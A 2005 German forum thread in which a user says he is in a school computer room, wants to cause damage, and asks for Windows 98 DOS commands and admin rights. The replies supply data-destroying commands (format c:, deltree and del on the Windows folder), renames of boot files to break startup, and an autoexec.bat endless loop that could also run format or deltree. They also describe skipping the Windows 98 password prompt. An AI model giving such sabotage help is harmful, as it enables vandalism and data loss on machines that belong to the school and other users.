DOS-Befehle für Win98(inforaum :P)

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Krato, 24. Oktober 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 24. Oktober 2005
    Bin gerade im Inforaum und will hier ein bisschen Schaden anrichten...sacht mal schnell ein paar Befehle durch :p thx
    PS.Win98///und die Adminrechte brauch ich auch noch :p
    MFG Krato
     

  2. Anzeige
  3. #2 24. Oktober 2005
    Format c: /q
    Deltree c:/windows/
    Del C:/windows/*.*
    Och da gibs noch mehr :D


    Fällt ma spontan noch einen Ein ihr habt inet zugang ;) schau mal ob virenscanner druf is und router/Proxy
     
  4. #3 24. Oktober 2005
    MIst....brauch auch noch die Admin rechte....weiste wie ich die bekomme? und kennst du auch noch sachen die den rechner nicht GANZ in ***** setzten?
     
  5. #4 24. Oktober 2005
    Hmm admin solltest du bekommen in dem du neu startest und dann als administrator einlogst (weiss gar ned das win98 benutzerkonten ohne adminrechte hat)

    ja weiss ich noch

    rename c:/windows/win.exe win.bak
    rename c:/autoexec.bat autoexec.bak
    rename c:/config.sys config.bak


    Die User unter Win9x/ME diene einzig der Übersicht und Ordnung. Es ist mit der strengen Verwaltung von WinNT-aufwärts keinesfalls zu vergleichen.
    Ungefähr so wie ein offenes Bücherregal im Vergleich zu festen Stahlspinden. Es wird faktisch erwartet, dass jeder user sich benimmt, aber wenigstens ein bisschen eigene Optik udn Dateiablagen bekommt.
    Da ich User auf einem novell-Server zu verwalten habe kann nich dir nur sagen, dass das was du da vor hast relativ sehr mutig ist und auf gegenseitigem Respekt, nicht aber technischer Kontrolle basiert.

    lese daraus das eigentlich jeder admin ist

    Hier noch was zum thema

    WinFAQ - Fehlerseite

    *args edit 3

    edit 4 ich schick dir eben meine icq nummer go.icq.com <<< für dich ;) dann kannst icq auch so nutzen :D kennt ja eigentlich jeder
     
  6. #5 24. Oktober 2005
    also ich hab da noch was nettes

    das mal in die autoexec.bat reinschreiben

    Code:
    :schleife
    pause
    goto schleife
    
    der sagt beim start dann immer "Weiter mit Beliebiger Taste"
    und das hört nie mehr auf ^^

    kannst halt da auch so was wie "format c:" oder "deltree" oder "del"
    irgendwas hineinschreiben die schalter kannste dir ja per google suchen also z.b del *.* -q (weiß nicht obs -q gibt kein bog nach zu schuaen)

    EDIT 2:

    Adminrechte::
    So weit ich mich erinnere kann man einfach bei der PW eingabe auf abrechen klicken dann gehts trozdem weiter ^^

    und man hat halt admin rechte unter windows 98 ^^
     

  7. Videos zum Thema
Die Seite wird geladen...
Similar Threads - DOS Befehle Win98
  1. Antworten:
    3
    Aufrufe:
    614
  2. ms dos befehle

    zodiake , 18. November 2005 , im Forum: Windows
    Antworten:
    4
    Aufrufe:
    710
  3. Antworten:
    4
    Aufrufe:
    662
  4. Antworten:
    2
    Aufrufe:
    1.077
  5. DOS Befehle

    poison0815 , 17. Oktober 2005 , im Forum: Sicherheit & Datenschutz
    Antworten:
    12
    Aufrufe:
    1.300